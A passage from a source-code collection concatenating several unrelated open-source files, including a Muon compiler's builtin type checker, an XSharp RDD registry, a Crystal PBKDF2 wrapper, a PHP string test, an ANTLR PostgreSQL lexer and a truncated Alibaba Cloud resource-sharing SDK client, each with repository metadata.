} else if a.ti == c.tags.char_.ti && (b.ti.flags & TypeFlags.intval) != 0 {
tag = c.tags.char_
} else if (a.ti.flags & TypeFlags.intval) != 0 && b.ti == c.tags.char_.ti {
tag = c.tags.char_
} else if a.ti == c.tags.char_.ti && b.ti == c.tags.char_.ti {
tag = c.tags.int_
}
} else if op == "*" || op == "/" {
if (a.ti.flags & TypeFlags.anyNumber) != 0 && (b.ti.flags & TypeFlags.anyNumber) != 0 {
tag = tryUnifyNumbers(c.tags, a, ax, b, bx)
}
} else if op == "%" {
tag = tryUnifyIntvals(c.tags, a, ax, b, bx)
} else if op == "&" || op == "|" {
if (a.ti.flags & TypeFlags.flagsEnum) != 0 && (b.ti.flags & TypeFlags.flagsEnum) != 0 && a.ti == b.ti {
tag = a
} else {
tag = tryUnifyIntvals(c.tags, a, ax, b, bx)
}
} else if op == "&&" || op == "||" {
if (a.ti.flags & TypeFlags.boolval) != 0 && (b.ti.flags & TypeFlags.boolval) != 0 {
tag = c.tags.bool_
}
} else if op == ">>" || op == "<<" {
if (a.ti.flags & TypeFlags.intval) != 0 && (b.ti.flags & TypeFlags.intval) != 0 {
if a.ti.rank >= 4 {
tag = a
} else if (a.ti.flags & TypeFlags.unsigned) != 0 {
tag = c.tags.uint_
} else {
tag = c.tags.int_
}
}
} else if op == "==" || op == "!=" {
if !canApplyCompareEqualsOperator(c, a, ax, b, bx) {
badBinaryOp(c, err, a, b)
}
return c.tags.bool_
} else if op == ">" || op == "<" || op == ">=" || op == "<=" {
if !canApplyCompareOrderedOperator(c, a, ax, b, bx) {
badBinaryOp(c, err, a, b)
}
return c.tags.bool_
}
if tag.ti == null {
badBinaryOp(c, err, a, b)
}
return tag
}
numberSuffixToTag(c TypeCheckerContext, suffix string) {
if suffix == "sb" {
return c.tags.sbyte_
} else if suffix == "b" {
return c.tags.byte_
} else if suffix == "s" {
return c.tags.short_
} else if suffix == "us" {
return c.tags.ushort_
} else if suffix == "u" {
return c.tags.uint_
} else if suffix == "L" {
return c.tags.long_
} else if suffix == "uL" {
return c.tags.ulong_
} else if suffix == "sz" {
return c.tags.ssize_
} else if suffix == "usz" {
return c.tags.usize_
} else if suffix == "d" {
return c.tags.double_
} else {
return Tag{}
}
}
canFitUnsigned(value ulong, tag Tag) {
if tag.ti.rank == 1 {
return value <= 0xff
} else if tag.ti.rank == 2 {
return value <= 0xffff
} else if tag.ti.rank <= 6 {
return value <= 0xffffffff_uL
} else {
return true
}
}
canFitSigned(value long, tag Tag) {
if tag.ti.rank == 1 {
return sbyte.minValue <= value && value <= sbyte.maxValue
} else if tag.ti.rank == 2 {
return short.minValue <= value && value <= short.maxValue
} else if tag.ti.rank <= 6 {
return int.minValue <= value && value <= int.maxValue
} else {
return true
}
}
getArgOfType(c TypeCheckerContext, e CallExpression, index int, dest Tag) {
if index >= e.args.count {
return Tag{}
}
arg := e.args[index]
tag := checkExpression(c, arg)
if !assign(c, tag, arg, dest) {
badArg(c, arg, tag, dest)
return Tag{}
}
return tag
}
getArgWithTypeFlags(c TypeCheckerContext, e CallExpression, index int, flags TypeFlags, allowNull bool, message string) {
if index >= e.args.count {
return Tag{}
}
arg := e.args[index]
tag := checkExpression(c, arg)
if tag.ti == null || ((tag.ti.flags & flags) != 0 || (tag.ti == Tag.null_.ti && allowNull)) {
return tag
}
c.errors.add(Error.at(c.unit, RangeFinder.find(arg), message))
return Tag{}
}
getTypeArg(c TypeCheckerContext, e CallExpression, index int) {
return getTypeArgWithTypeFlags(c, e, index, TypeFlags.anyValue, "Expected: type")
}
getTypeArgWithTypeFlags(c TypeCheckerContext, e CallExpression, index int, flags TypeFlags, message string) {
if index >= e.args.count {
return Tag{}
}
arg := e.args[index]
tag := resolveType(c, arg, ResolveTypeOptions.none)
if tag.ti == null {
return tag
}
if (tag.ti.flags & flags) != 0 {
recordTag(c, arg, tag) // Note: the actual tag of the expression would be typeof<tag>
return tag
}
c.errors.add(Error.at(c.unit, RangeFinder.find(arg), message))
return Tag{}
}
checkRemainingArgs(c TypeCheckerContext, e CallExpression, index int, implicitArg bool) {
for i := index; i < e.args.count {
checkExpression(c, e.args[i])
}
if index == e.args.count {
return true
}
bias := implicitArg ? 1 : 0
badArgs(c, e.openParen, index + bias, e.args.count + bias)
return false
}
checkAbandon(c TypeCheckerContext, e CallExpression) {
if e.args.count == 0 {
return c.tags.void_
}
cond := getArgOfType(c, e, 0, c.tags.int_)
checkRemainingArgs(c, e, 1, false)
return c.tags.void_
}
checkAssert(c TypeCheckerContext, e CallExpression) {
cond := getArgOfType(c, e, 0, c.tags.bool_)
checkRemainingArgs(c, e, 1, false)
return c.tags.void_
}
checkCheckedCast(c TypeCheckerContext, e CallExpression) {
from := getArgWithTypeFlags(c, e, 0, TypeFlags.intval | TypeFlags.taggedPointerEnum, false, "Expected: expression of integer or tagged pointer type")
if from.ti == null || (from.ti.flags & TypeFlags.intval) != 0 {
to := getTypeArgWithTypeFlags(c, e, 1, TypeFlags.intval, "Expected: integer type")
if !checkRemainingArgs(c, e, 2, false) || from.ti == null || to.ti == null {
return to
}
if from.ti == to.ti {
redundantCast(c, e.openParen)
} else if canCoerce(c, from, null, to) {
c.errors.add(Error.at(c.unit, e.openParen.span, "checked_cast will always succeed; use a normal cast instead"))
}
return to
} else {
to := getTypeArg(c, e, 1)
if !checkRemainingArgs(c, e, 2, false) || from.ti == null || to.ti == null {
return to
}
if !from.ti.taggedPointerOptions.contains(to) {
badConversion(c, e.args[0], from, to)
return Tag{}
}
return to
}
}
checkCast(c TypeCheckerContext, e CallExpression) {
from := getArgWithTypeFlags(c, e, 0, TypeFlags.intval | TypeFlags.floatval | TypeFlags.boolval | TypeFlags.enum_ | TypeFlags.anyPointer, true, "Expected: expression of number, bool, enum or pointer type")
if from.ti == null {
to := getTypeArg(c, e, 1)
checkRemainingArgs(c, e, 2, false)
return to
} else if (from.ti.flags & TypeFlags.intval) != 0 {
to := getTypeArgWithTypeFlags(c, e, 1, TypeFlags.intval | TypeFlags.floatval | TypeFlags.enum_, "Expected: number or enum type")
if !checkRemainingArgs(c, e, 2, false) || from.ti == null || to.ti == null {
return to
}
if from.ti == to.ti {
redundantCast(c, e.openParen)
} else if (to.ti.flags & TypeFlags.enum_) != 0 {
if !assign(c, from, e.args[0], c.tags.uint_) {
badConversion(c, e.args[0], from, c.tags.uint_)
}
}
return to
} else if (from.ti.flags & TypeFlags.floatval) != 0 {
to := getTypeArgWithTypeFlags(c, e, 1, TypeFlags.intval | TypeFlags.floatval, "Expected: number type")
if !checkRemainingArgs(c, e, 2, false) || to.ti == null {
return to
}
if from.ti == to.ti {
redundantCast(c, e.openParen)
}
return to
} else if (from.ti.flags & TypeFlags.boolval) != 0 {
to := getTypeArgWithTypeFlags(c, e, 1, TypeFlags.boolval, "Expected: boolean type")
if !checkRemainingArgs(c, e, 2, false) || to.ti == null {
return to
}
if from.ti == to.ti {
redundantCast(c, e.openParen)
}
return to
} else if (from.ti.flags & TypeFlags.enum_) != 0 {
to := getTypeArgWithTypeFlags(c, e, 1, TypeFlags.intval, "Expected: uint")
if !checkRemainingArgs(c, e, 2, false) || to.ti == null {
return to
}
if from.ti == to.ti {
redundantCast(c, e.openParen)
}
if to.ti != c.tags.uint_.ti {
c.errors.add(Error.at(c.unit, RangeFinder.find(e.args[1]), "Expected: uint"))
}
return to
} else if from.ti == Tag.null_.ti {
to := getTypeArgWithTypeFlags(c, e, 1, TypeFlags.anyPointer, "Expected: pointer type")
checkRemainingArgs(c, e, 2, false)
return to
} else if (from.ti.flags & TypeFlags.taggedPointerEnum) != 0 {
to := getTypeArg(c, e, 1)
if !checkRemainingArgs(c, e, 2, false) || to.ti == null {
return to
}
if from.ti == to.ti {
redundantCast(c, e.openParen)
} else {
c.errors.add(Error.at(c.unit, RangeFinder.find(e.args[0]), "Must use either checked_cast or pointer_cast for tagged pointer"))
}
return to
} else if (from.ti.flags & TypeFlags.anyPointer) != 0 {
to := getTypeArgWithTypeFlags(c, e, 1, TypeFlags.taggedPointerEnum, "Expected: tagged pointer type; or, use pointer_cast")
if !checkRemainingArgs(c, e, 2, false) || to.ti == null {
return to
}
if !to.ti.taggedPointerOptions.contains(from) {
badConversion(c, e.args[0], from, to)
}
return to
} else {
abandon()
}
}
checkPointerCast(c TypeCheckerContext, e CallExpression) {
from := getArgWithTypeFlags(c, e, 0, TypeFlags.anyPointer | TypeFlags.string_, true, "Expected: expression of pointer type or string literal")
if from.ti == null || (from.ti.flags & TypeFlags.taggedPointerEnum) == 0 {
to := getTypeArgWithTypeFlags(c, e, 1, TypeFlags.anyPointer, "Expected: pointer type")
if !checkRemainingArgs(c, e, 2, false) || from.ti == null || to.ti == null {
return to
}
if Tag.equals(from, to) {
redundantCast(c, e.openParen)
} else if (to.ti.flags & TypeFlags.taggedPointerEnum) != 0 && !to.ti.taggedPointerOptions.contains(from) {
badConversion(c, e.args[0], from, to)
}
return to
} else if from.ti == c.tags.string_.ti {
if !e.args[0].is(StringExpression) {
c.errors.add(Error.at(c.unit, RangeFinder.find(e.args[0]), "Expected: string literal"))
}
to := getTypeArgWithTypeFlags(c, e, 1, TypeFlags.pointer_ | TypeFlags.cstring_, "Expected: pointer or cstring")
checkRemainingArgs(c, e, 2, false)
return to
} else {
to := getTypeArgWithTypeFlags(c, e, 1, TypeFlags.pointer_, "Expected: pointer")
checkRemainingArgs(c, e, 2, false)
return to
}
}
checkTransmute(c TypeCheckerContext, e CallExpression) {
from := getArgWithTypeFlags(c, e, 0, TypeFlags.anyTransmutableValue, true, "Expected: expression of transmutable type")
to := getTypeArgWithTypeFlags(c, e, 1, TypeFlags.anyTransmutableValue, "Expected: transmutable type")
if !checkRemainingArgs(c, e, 2, false) || from.ti == null || to.ti == null {
return to
}
if Tag.equals(from, to) {
c.errors.add(Error.at(c.unit, RangeFinder.find(e), "transmute is redundant"))
}
return to
}
checkIs(c TypeCheckerContext, e CallExpression, from Tag) {
to := getTypeArg(c, e, 0)
if !checkRemainingArgs(c, e, 1, true) || to.ti == null {
return c.tags.bool_
}
if (from.ti.flags & TypeFlags.ptr_) != 0 {
from = from.args[0]
}
if from.ti == Tag.null_.ti || !from.ti.taggedPointerOptions.contains(to) {
badConversion(c, e.args[0], from, to)
}
return c.tags.bool_
}
checkAs(c TypeCheckerContext, e CallExpression, from Tag) {
to := getTypeArg(c, e, 0)
if !checkRemainingArgs(c, e, 1, true) || to.ti == null {
return Tag{}
}
if (from.ti.flags & TypeFlags.ptr_) != 0 {
from = from.args[0]
}
if from.ti == Tag.null_.ti {
if (to.ti.flags & TypeFlags.anyPointer) == 0 {
badConversion(c, e.args[0], from, to)
return Tag{}
}
return to
} else if (from.ti.flags & TypeFlags.taggedPointerEnum) != 0 {
if !from.ti.taggedPointerOptions.contains(to) {
badConversion(c, e.args[0], from, to)
return Tag{}
}
} else {
if (to.ti.flags & TypeFlags.taggedPointerEnum) == 0 || !to.ti.taggedPointerOptions.contains(from) {
badConversion(c, e.args[0], from, to)
return Tag{}
}
}
return to
}
checkFormat(c TypeCheckerContext, e CallExpression, from Tag) {
// TODO: parse format string and make sure that it is consistent with the number of arguments
index := 0
if from.ti == null {
if e.args.count == 0 {
c.errors.add(Error.at(c.unit, e.openParen.span, "Expected 1 or more args but got 0 args"))
return c.tags.string_
}
fmtArg := e.args[0]
fmt := checkExpression(c, fmtArg)
if fmt.ti == null || !fmtArg.is(StringExpression) {
c.errors.add(Error.at(c.unit, RangeFinder.find(fmtArg), "Expected: string literal"))
}
index = 1
}
for i := index; i < e.args.count {
a := e.args[i]
checkExpression(c, a)
}
return c.tags.string_
}
checkMinMax(c TypeCheckerContext, e CallExpression) {
lhs := getArgWithTypeFlags(c, e, 0, TypeFlags.anyNumber, false, "Expected: expression of number type")
rhs := getArgWithTypeFlags(c, e, 1, TypeFlags.anyNumber, false, "Expected: expression of number type")
if !checkRemainingArgs(c, e, 2, false) || lhs.ti == null || rhs.ti == null {
return lhs.ti != null ? lhs : rhs
}
result := tryUnifyNumbers(c.tags, lhs, e.args[0], rhs, e.args[1])
if result.ti == null {
c.errors.add(Error.at(c.unit, e.openParen.span, format("Function cannot be applied to expressions of type {} and {}", lhs.toString(), rhs.toString())))
}
return result
}
checkXor(c TypeCheckerContext, e CallExpression) {
lhs := getArgWithTypeFlags(c, e, 0, TypeFlags.intval, false, "Expected: expression of integer type")
rhs := getArgWithTypeFlags(c, e, 1, TypeFlags.intval, false, "Expected: expression of integer type")
if !checkRemainingArgs(c, e, 2, false) || lhs.ti == null || rhs.ti == null {
return lhs.ti != null ? lhs : rhs
}
result := tryUnifyIntvals(c.tags, lhs, e.args[0], rhs, e.args[1])
if result.ti == null {
c.errors.add(Error.at(c.unit, e.openParen.span, format("Function cannot be applied to expressions of type {} and {}", lhs.toString(), rhs.toString())))
}
return result
}
checkSizeof(c TypeCheckerContext, e CallExpression) {
type := getTypeArg(c, e, 0)
checkRemainingArgs(c, e, 1, false)
return c.tags.int_
}
checkComputeHash(c TypeCheckerContext, e CallExpression) {
arg := getArgWithTypeFlags(c, e, 0, TypeFlags.anyValue, false, "Expected: non-null value")
checkRemainingArgs(c, e, 1, false)
return c.tags.uint_
}
checkDefaultValue(c TypeCheckerContext, e CallExpression) {
type := getTypeArg(c, e, 0)
checkRemainingArgs(c, e, 1, false)
return type
}
checkGetArgcArgv(c TypeCheckerContext, e CallExpression) {
c.comp.flags |= CompilationFlags.useArgcArgv
argc := getArgOfType(c, e, 0, getSingleArgTag(c.tags.ptrTi, c.tags.int_))
argv := getArgOfType(c, e, 1, getSingleArgTag(c.tags.ptrTi, c.tags.pointer_))
checkRemainingArgs(c, e, 2, false)
return c.tags.void_
}
}
| mupad | 4 | jturner/muon | compiler/type_checker_builtin.mu | [
"MIT"
] |
//
// Copyright (c) XSharp B.V. All Rights Reserved.
// Licensed under the Apache License, Version 2.0.
// See License.txt in the project root for license information.
//
USING XSharp
USING System.Collections.Generic
USING System.Reflection
#define XSHARPRDD "XSharp.Rdd" // Make sure this is the same as the file name for XSharp.Rdd (includin the case)
BEGIN NAMESPACE XSharp.RDD
/// <summary>This class is used to register RDD names with the matching System.Types</summary>
CLASS RegisteredRDD
/// <summary>Name of the assembly where the RDD is defined.</summary>
PROPERTY AssemblyName AS STRING AUTO
/// <summary>Assembly object where the RDD is defined</summary>
PROPERTY Assembly AS Assembly AUTO
/// <summary>'Common' name of the RDD</summary>
PROPERTY RddName AS STRING AUTO
/// <summary>Type of the RDD</summary>
PROPERTY RddType AS System.Type AUTO
/// <summary>Fully qualified type name of the RDD</summary>
PROPERTY TypeName AS STRING AUTO
STATIC PRIVATE RDDs AS Dictionary<STRING, RegisteredRDD>
CONSTRUCTOR(cRDDName AS STRING, oType AS System.Type)
SELF:RddName := cRDDName
SELF:RddType := oType
SELF:TypeName := oType:Name
SELF:Assembly := oType:Assembly
SELF:AssemblyName := SELF:Assembly:GetName():Name
RETURN
CONSTRUCTOR (cAssemblyName AS STRING, cRddName AS STRING, cTypeName AS STRING)
SELF:AssemblyName := cAssemblyName
SELF:RddName := cRddName
SELF:TypeName := cTypeName
RETURN
STATIC CONSTRUCTOR()
RDDs := Dictionary<STRING, RegisteredRDD>{StringComparer.OrdinalIgnoreCase}
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "CAVODBF", "XSharp.RDD.DBF"}) // Just DBF
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "DBF", "XSharp.RDD.DBF"}) // Just DBF
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "DBFDBT", "XSharp.RDD.DBFDBT"}) // DBF + DBT
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "DBFNTX", "XSharp.RDD.DBFNTX"}) // DBF + DBT + NTX
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "DBFFPT", "XSharp.RDD.DBFFPT"}) // DBF + FPT
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "DBFCDX", "XSharp.RDD.DBFCDX"}) // DBF + FPT + CDX
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "DBFVFP", "XSharp.RDD.DBFVFP"}) // DBF + FPT + CDX + VFP fields
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "DBFVFPSQL","XSharp.RDD.DBFVFPSQL"}) // DBF + FPT + CDX + VFP fields
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "DELIM", "XSharp.RDD.DELIM"}) // DELIM
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "SDF", "XSharp.RDD.SDF"}) // SDF
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "TSV", "XSharp.RDD.TSV"}) // TSV = tab separated
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "CSV", "XSharp.RDD.CSV"}) // CSV = semi colon separated
//RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "DBFMEMO", "XSharp.RDD.DBFMEMO"}) // DBF + NTX + DBV
//RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "DBFBLOB", "XSharp.RDD.DBFBLOB"}) // DBV only
//RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "DBFSMT", "XSharp.RDD.DBFSMT"}) // DBF + SMT
//RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "DBFNSX", "XSharp.RDD.DBFNSX"}) // DBF + SMT + NSX
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "ADSADT", "Advantage.ADSADT"}) // ADSADT
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "AXDBFCDX", "Advantage.AXDBFCDX"}) // ADS DBFCDX
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "AXDBFNTX", "Advantage.AXDBFNTX"}) // ADS DBFNTX
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "AXDBFVFP", "Advantage.AXDBFVFP"}) // ADS AXDBFVFP
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "AXSQLCDX", "Advantage.AXSQLCDX"}) // SQL CDX
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "AXSQLNTX", "Advantage.AXSQLNTX"}) // SQL NTX
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "AXSQLVFP", "Advantage.AXSQLVFP"}) // SQL VFP
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "AXSQLADT", "Advantage.AXSQLADT"}) // SQL ADT
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "Advantage.ADSADT", "Advantage.ADSADT"}) // ADSADT
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "Advantage.AXDBFCDX", "Advantage.AXDBFCDX"}) // ADS DBFCDX
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "Advantage.AXDBFNTX", "Advantage.AXDBFNTX"}) // ADS DBFNTX
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "Advantage.AXDBFVFP", "Advantage.AXDBFVFP"}) // ADS AXDBFVFP
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "Advantage.AXSQLCDX", "Advantage.AXSQLCDX"}) // ADS DBFCDX
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "Advantage.AXSQLNTX", "Advantage.AXSQLNTX"}) // ADS DBFNTX
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "Advantage.AXSQLVFP", "Advantage.AXSQLVFP"}) // ADS AXDBFVFP
RegisteredRDD.Add( RegisteredRDD{XSHARPRDD, "Advantage.AXSQLADT", "Advantage.AXSQLADT"}) // ADS AXDBFVFP
RETURN
/// <summary>Locate an entry for a particular RDD name</summary>
/// <returns>NULL when no RDD registration found.</returns>
STATIC METHOD Find(cRddName AS STRING) AS RegisteredRDD
IF RDDs:ContainsKey(cRddName)
RETURN (RegisteredRDD) RDDs:Item[cRddName]
ENDIF
RETURN NULL
/// <summary>Add a registration for a new RDD.</summary>
/// <returns>FALSE when the RDD name is already registered, TRUE when the registration succeeded.</returns>
STATIC METHOD Add(oRDD AS RegisteredRDD) AS LOGIC
LOCAL cRddName AS STRING
cRddName := oRDD:RddName
IF RDDs:ContainsKey(cRddName)
RETURN FALSE
ENDIF
RDDs:Add(cRddName, oRDD)
RETURN TRUE
/// <summary> try to resolve the RDD </summary>
METHOD Load() AS VOID
IF SELF:RddType == NULL
IF SELF:Assembly == NULL
SELF:Assembly := AssemblyHelper.Load(SELF:AssemblyName)
ENDIF
IF SELF:Assembly != NULL
SELF:RddType := SELF:Assembly:GetType(SELF:TypeName)
ENDIF
ENDIF
END CLASS
END NAMESPACE
| xBase | 4 | orangesocks/XSharpPublic | Runtime/XSharp.Core/RDD/RegisteredRDD.prg | [
"Apache-2.0"
] |
require "openssl"
require "openssl/algorithm"
module OpenSSL::PKCS5
def self.pbkdf2_hmac_sha1(secret, salt, iterations = 2**16, key_size = 64) : Bytes
buffer = Bytes.new(key_size)
if LibCrypto.pkcs5_pbkdf2_hmac_sha1(secret, secret.bytesize, salt, salt.bytesize, iterations, key_size, buffer) != 1
raise OpenSSL::Error.new "pkcs5_pbkdf2_hmac"
end
buffer
end
def self.pbkdf2_hmac(secret, salt, iterations = 2**16, algorithm : OpenSSL::Algorithm = OpenSSL::Algorithm::SHA1, key_size = 64) : Bytes
{% if LibCrypto.has_method?(:pkcs5_pbkdf2_hmac) %}
evp = algorithm.to_evp
buffer = Bytes.new(key_size)
if LibCrypto.pkcs5_pbkdf2_hmac(secret, secret.bytesize, salt, salt.bytesize, iterations, evp, key_size, buffer) != 1
raise OpenSSL::Error.new "pkcs5_pbkdf2_hmac"
end
buffer
{% else %}
raise OpenSSL::Error.new "Method 'pkcs5_pbkdf2_hmac' not supported with OpenSSL version #{LibSSL::OPENSSL_VERSION}"
{% end %}
end
end
| Crystal | 4 | jessedoyle/crystal | src/openssl/pkcs5.cr | [
"Apache-2.0"
] |
--TEST--
Bug #54454 (substr_compare incorrectly reports equality in some cases)
--FILE--
<?php
var_dump(substr_compare('/', '/asd', 0, 4));
?>
--EXPECT--
int(-3)
| PHP | 3 | guomoumou123/php5.5.10 | ext/standard/tests/strings/bug54454.phpt | [
"PHP-3.01"
] |
/*
* Licensed to the Apache Software Foundation (ASF) under one or more
* contributor license agreements. See the NOTICE file distributed with
* this work for additional information regarding copyright ownership.
* The ASF licenses this file to You under the Apache License, Version 2.0
* (the "License"); you may not use this file except in compliance with
* the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
lexer grammar ModeLexer;
import Symbol, PostgreSQLKeyword, Keyword, Comments, Literals;
BEGIN_DOLLAR_STRING_CONSTANT
: '$' TAG? '$'
{pushTag();} -> pushMode (DOLLAR_QUOTED_STRING_MODE)
;
fragment TAG
: IDENTIFIER_START_CHAR STRICT_IDENTIFIER_CHAR*
;
mode DOLLAR_QUOTED_STRING_MODE;
DOLLAR_TEXT
: ~ '$'+
| '$' ~ '$'*
;
END_DOLLAR_STRING_CONSTANT
: ('$' TAG? '$')
{isTag()}?
{popTag();} -> popMode
;
| ANTLR | 4 | Trydamere/shardingsphere | shardingsphere-sql-parser/shardingsphere-sql-parser-dialect/shardingsphere-sql-parser-postgresql/src/main/antlr4/imports/postgresql/ModeLexer.g4 | [
"Apache-2.0"
] |
(mac switch (alts..)
(tr (reverse alts) ()
(fun (acc alt)
'(if %(head alt)
(do %(tail alt)..)
%acc)))) | Grammatical Framework | 4 | daota2/fffff | v1/lib/cond.gf | [
"MIT"
] |
/**
*
*/
import Util;
import OpenApi;
import OpenApiUtil;
import EndpointUtil;
extends OpenApi;
init(config: OpenApi.Config){
super(config);
@endpointRule = 'regional';
checkConfig(config);
@endpoint = getEndpoint('resourcesharing', @regionId, @endpointRule, @network, @suffix, @endpointMap, @endpoint);
}
function getEndpoint(productId: string, regionId: string, endpointRule: string, network: string, suffix: string, endpointMap: map[string]string, endpoint: string) throws: string{
if (!Util.empty(endpoint)) {
return endpoint;
}
if (!Util.isUnset(endpointMap) && !Util.empty(endpointMap[regionId])) {
return endpointMap[regionId];
}
return EndpointUtil.getEndpointRules(productId, regionId, endpointRule, network, suffix);
}
model AssociateResourceShareRequest {
resourceShareId?: string(name='ResourceShareId'),
resources?: [
{
resourceType?: string(name='ResourceType'),
resourceId?: string(name='ResourceId'),
}
](name='Resources'),
targets?: [ string ](name='Targets'),
}
model AssociateResourceShareResponseBody = {
resourceShareAssociations?: [
{
updateTime?: string(name='UpdateTime'),
entityId?: string(name='EntityId'),
resourceShareName?: string(name='ResourceShareName'),
createTime?: string(name='CreateTime'),
entityType?: string(name='EntityType'),
resourceShareId?: string(name='ResourceShareId'),
associationStatusMessage?: string(name='AssociationStatusMessage'),
associationType?: string(name='AssociationType'),
associationStatus?: string(name='AssociationStatus'),
}
](name='ResourceShareAssociations'),
requestId?: string(name='RequestId'),
}
model AssociateResourceShareResponse = {
headers: map[string]string(name='headers'),
body: AssociateResourceShareResponseBody(name='body'),
}
async function associateResourceShareWithOptions(request: AssociateResourceShareRequest, runtime: Util.RuntimeOptions): AssociateResourceShareResponse {
Util.validateModel(request);
var query = {};
query["ResourceShareId"] = request.resourceShareId;
query["Resources"] = request.resources;
query["Targets"] = request.targets;
var req = new OpenApi.OpenApiRequest{
query = OpenApiUtil.query(query),
body = Util.toMap(request),
};
var params = new OpenApi.Params{
action = 'AssociateResourceShare',
version = '2020-01-10',
protocol = 'HTTPS',
pathname = '/',
method = 'POST',
authType = 'AK',
style = 'RPC',
reqBodyType = 'json',
bodyType = 'json',
};
return callApi(params, req, runtime);
}
async function associateResourceShare(request: AssociateResourceShareRequest): AssociateResourceShareResponse {
var runtime = new Util.RuntimeOptions{};
return associateResourceShareWithOptions(request, runtime);
}
model CreateResourceShareRequest {
resourceShareName?: string(name='ResourceShareName'),
resources?: [
{
resourceType?: string(name='ResourceType'),
resourceId?: string(name='ResourceId'),
}
](name='Resources'),
targets?: [ string ](name='Targets'),
}
model CreateResourceShareResponseBody = {
requestId?: string(name='RequestId'),
resourceShare?: {
updateTime?: string(name='UpdateTime'),
resourceShareName?: string(name='ResourceShareName'),
resourceShareOwner?: string(name='ResourceShareOwner'),
createTime?: string(name='CreateTime'),
resourceShareId?: string(name='ResourceShareId'),
resourceShareStatus?: string(name='ResourceShareStatus'),
}(name='ResourceShare'),
}
model CreateResourceShareResponse = {
headers: map[string]string(name='headers'),
body: CreateResourceShareResponseBody(name='body'),
}
async function createResourceShareWithOptions(request: CreateResourceShareRequest, runtime: Util.RuntimeOptions): CreateResourceShareResponse {
Util.validateModel(request);
var query = {};
query["ResourceShareName"] = request.resourceShareName;
query["Resources"] = request.resources;
query["Targets"] = request.targets;
var req = new OpenApi.OpenApiRequest{
query = OpenApiUtil.query(query),
body = Util.toMap(request),
};
var params = new OpenApi.Params{
action = 'CreateResourceShare',
version = '2020-01-10',
protocol = 'HTTPS',
pathname = '/',
method = 'POST',
authType = 'AK',
style = 'RPC',
reqBodyType = 'json',
bodyType = 'json',
};
return callApi(params, req, runtime);
}
async function createResourceShare(request: CreateResourceShareRequest): CreateResourceShareResponse {
var runtime = new Util.RuntimeOptions{};
return createResourceShareWithOptions(request, runtime);
}
model DeleteResourceShareRequest {
resourceShareId?: string(name='ResourceShareId'),
}
model DeleteResourceShareResponseBody = {
requestId?: string(name='RequestId'),
}
model DeleteResourceShareResponse = {
headers: map[string]string(name='headers'),
body: DeleteResourceShareResponseBody(name='body'),
}
async function deleteResourceShareWithOptions(request: DeleteResourceShareRequest, runtime: Util.RuntimeOptions): DeleteResourceShareResponse {
Util.validateModel(request);
var query = {};
query["ResourceShareId"] = request.resourceShareId;
var req = new OpenApi.OpenApiRequest{
query = OpenApiUtil.query(query),
body = Util.toMap(request),
};
var params = new OpenApi.Params{
action = 'DeleteResourceShare',
version = '2020-01-10',
protocol = 'HTTPS',
pathname = '/',
method = 'POST',
authType = 'AK',
style = 'RPC',
reqBodyType = 'json',
bodyType = 'json',
};
return callApi(params, req, runtime);
}
async function deleteResourceShare(request: DeleteResourceShareRequest): DeleteResourceShareResponse {
var runtime = new Util.RuntimeOptions{};
return deleteResourceShareWithOptions(request, runtime);
}
model DescribeRegionsRequest {
acceptLanguage?: string(name='AcceptLanguage'),
}
model DescribeRegionsResponseBody = {
requestId?: string(name='RequestId'),
regions?: [
{
localName?: string(name='LocalName'),
regionEndpoint?: string(name='RegionEndpoint'),
regionId?: string(name='RegionId'),
}
](name='Regions'),
}
model DescribeRegionsResponse = {
headers: map[string]string(name='headers'),
body: DescribeRegionsResponseBody(name='body'),
}
async function describeRegionsWithOptions(request: DescribeRegionsRequest, runtime: Util.RuntimeOptions): DescribeRegionsResponse {
Util.validateModel(request);
var query = {};
query["AcceptLanguage"] = request.acceptLanguage;
var req = new OpenApi.OpenApiRequest{
query = OpenApiUtil.query(query),
body = Util.toMap(request),
};
var params = new OpenApi.Params{
action = 'DescribeRegions',
version = '2020-01-10',
protocol = 'HTTPS',
pathname = '/',
method = 'POST',
authType = 'AK',
style = 'RPC',
reqBodyType = 'json',
bodyType = 'json',
};
return callApi(params, req, runtime);
}
async function describeRegions(request: DescribeRegionsRequest): DescribeRegionsResponse {
var runtime = new Util.RuntimeOptions{};
return describeRegionsWithOptions(request, runtime);
}
model DisassociateResourceShareRequest {
resourceShareId?: string(name='ResourceShareId'),
resources?: [
{
resourceType?: string(name='ResourceType'),
resourceId?: string(name='ResourceId'),
}
](name='Resources'),
targets?: [ string ](name='Targets'),
}
model DisassociateResourceShareResponseBody = {
resourceShareAssociations?: [
{
